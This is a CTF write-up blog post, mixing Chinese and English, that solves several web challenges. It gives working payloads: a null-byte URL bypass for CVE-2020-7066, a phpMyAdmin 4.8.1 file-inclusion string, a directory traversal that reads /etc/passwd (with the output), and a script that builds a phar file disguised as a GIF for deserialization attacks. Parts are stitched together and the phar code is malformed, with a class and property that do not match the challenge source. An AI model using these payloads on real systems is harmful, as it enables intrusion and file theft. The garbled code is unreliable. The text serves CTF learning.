标签:manifest txt meta rom pap option 如何 compress let
题目提示
cve-2020-7066
Hint: Flag in localhost
Tips: Host must be end with ‘123‘
You just view *.ctfhub.com
题目原型
#79329 get_headers() silently truncates after a null byte
This was tested on PHP 7.3, but the function has always had this bug.
The test script shows that this can cause well-written scripts to get headers for an unexpected domain. Those headers could leak sensitive information or unexpectedly contain attacker-controlled data.
解题方法
?url=http://127.0.0.123%00.ctfhub.com
收集信息
善用php bug搜索漏洞
解题方法
扫描后发现存在/phpmyadmin/,访问后得知版本信息 4.8.1
phpmyadmin 4.8.1存在文件包含漏洞,构造?target=db_datadict.php%253f/../../../../../../../../../flag
上传测试后发现只能上传图片类型文件
抓包
POST /download.php HTTP/1.1
...
Cookie: PHPSESSID=94b78b93ffa19e6bc6d07e0da5307548
Connection: keep-alive
Upgrade-Insecure-Requests: 1
filename=%E5%9B%BE%E7%89%87%E9%A9%AC.png
放包之后会显示文件内容
目录穿越
filename=../../../../../etc/passwd
显示结果
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
...
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
题目中的主要文件
.
├── class.php
├── delete.php
├── download.php
├── index.php
├── login.php
└── register.php
class.php是核心文件
class.php(简化)
<?php
class User {
public $db;
public function __destruct() {
$this->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}
public function __destruct() {
...
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function close() {
return file_get_contents($this->filename);
}
}
?>
File类中的close()方法存在RCE vulnerability
Q: 如何利用RCE vulnerability?
代码中并不 unserialize(),但存在文件上传点
It can be interpreted as a flag and the format is
xxx<?php xxx; __HALT_COMPILER();?>.The front content is not limited, but it must end with__HALT_COMPILER();?>, otherwise the phar extension will not recognize this file as a phar file.
A phar file is essentially a compressed file, in which the permissions, attributes and other information of each compressed file are included. This section also stores user-defined meta-data in serialized form, which is the core of the above attacks.
It is the contents of compressed file.
phar file format only
Construct a phar file according to the file structure, and PHP has a built-in class to handle related operations
Set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.
class Demo {
@unlink("phar.phar");
$phar = new Phar("phar.phar"); // suffix must be phar
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise as gif
$o = new file();
$o->output = "phpinfo();";
$phar->setMetadata($o); // store custom meta-data in manifest
$phar->addFromString("test.txt", "test"); // compressed file
$phar->stopBuffering(); // automatic computation of signature
};
标签:manifest txt meta rom pap option 如何 compress let
原文地址:https://www.cnblogs.com/0d4y/p/13414897.html
